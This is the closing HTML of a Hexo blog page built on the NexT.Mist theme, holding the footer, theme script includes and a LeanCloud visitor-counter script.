      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2017</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">sn0wdown</span>
</div>


<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Mist
  </a>
</div>


        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.1"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.1"></script>



  


  




	





  





  





  






  





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.1.js"></script>
  <script>AV.initialize("tenS5cAVQyl5NXriAEymVrVD-gzGzoHsz", "Sm01ckoe2iV2PHqJ74qEYLBG");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  

  

  

  
<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/src/love.js"></script>

</body>
</html>
